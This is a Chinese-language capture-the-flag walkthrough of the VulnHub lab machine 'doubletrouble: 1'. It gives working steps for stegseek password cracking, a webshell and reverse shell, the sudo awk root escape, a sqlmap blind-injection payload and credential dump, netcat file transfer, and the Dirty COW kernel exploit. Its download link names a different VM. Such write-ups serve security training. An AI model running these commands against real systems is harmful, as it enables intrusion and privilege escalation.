- 英文名称:doubletrouble: 1
- 中文名称:双重烦恼:1
- 发布日期:2021 年 9 月 11 日
- 难度:容易
- 描述:关于 vm:测试并从 virtualbox 导出。启用 dhcp 和嵌套 vtx/amdv。您可以通过电子邮件与我联系以获取故障排除或问题。
- 下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、主机发现(192.168.199.107)
主机发现
2、端口扫描,发现22端口和80端口
端口扫描
3、访问web页面
4、搜索web组件漏洞
web组件漏洞
5、发现web目录
┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.199.107/uploads/
==> DIRECTORY: http://192.168.199.107/backups/
==> DIRECTORY: http://192.168.199.107/secret/
...
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5
6、发现一个秘密文件
线索
7、尝试对图片进行提取嵌入信息
steghide info doubletrouble.jpg
尝试提取图片中的信息
8、使用Stegseek破解经过Steghide隐写的数据[1]
Stegseek是迄今为止全世界最快的Steghide破解器,该工具每秒能够处理数百万的密码。
值得一提的是,仅需两秒钟,该工具就可以跑完rockyou.txt字典。
而众所周知,rockyou.txt是一个包含了超过1400万个密码的强大字典文件。
─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt
得到密码:92camaro
秒出密码:92camaro
9、再次提取图片中的嵌入信息,得到邮箱和密码
┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out
[email protected]
otis666
得到web管理员密码
10、进入web后台,新增用户 ailx10
新增用户 ailx10
11、切换账号,创建项目,上传webshell
上传webshell
12、反弹shell
反弹shell
13、查看sudo,发现awk特权命令不需要密码
升级root
14、升级到root权限,竟然发现另一个靶机,果然是个老六
sudo awk 'BEGIN {system("/bin/sh")}'
遇见老六
15、nc 下载到本地
服务端:
nc -lvp 4444 > ailx10_double_trouble.ova
客户端:
nc 192.168.199.247 4444 < doubletrouble.ova
下载第二个 ova
16、开启第二个靶机,重新再来一遍渗透流程
第二个靶机
17、主机发现,多了一个IP:192.168.199.171
新增一个IP地址:192.168.199.171
18、端口扫描,发现22、80端口
端口扫描
19、访问web页面
web页面
20、尝试sqlmap注入
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---
存储sql注入漏洞
21、尝试获得数据库名字(doubletrouble)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db
数据库名
22、尝试获得表名称(users)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables
表名
23、尝试获得字段名称(username,password)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns
字段名称
24、尝试获得表中的字段内容
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1 |
| clapton | ZubZub99 |
+----------+----------+
字段内容
25、尝试ssh登录,获得普通用户的flag
ssh登录,获得普通flag
26、获取系统信息,尝试发现漏洞
系统信息
提权POC
27、编译45010发现缺少文件,只好上脏牛[2]
脏牛漏洞(CVE-2016–5195),影响低版本的Linux系统
Centos7/RHEL7 3.10.0-327.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1
漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。
修改su或者passwd程序就可以达到root的目的。
clapton@doubletrouble:~$ ls
45010.c dirty.c user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c dirty dirty.c user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash
mmap: 7f49735fb000
28、提权,获得root的flag
获得root的flag
到此,实验完成~
参考
- ^stegseek https://github.com/RickdeJager/stegseek/releases
- ^脏牛 https://github.com/firefart/dirtycow
编辑于 2022-08-21 21:08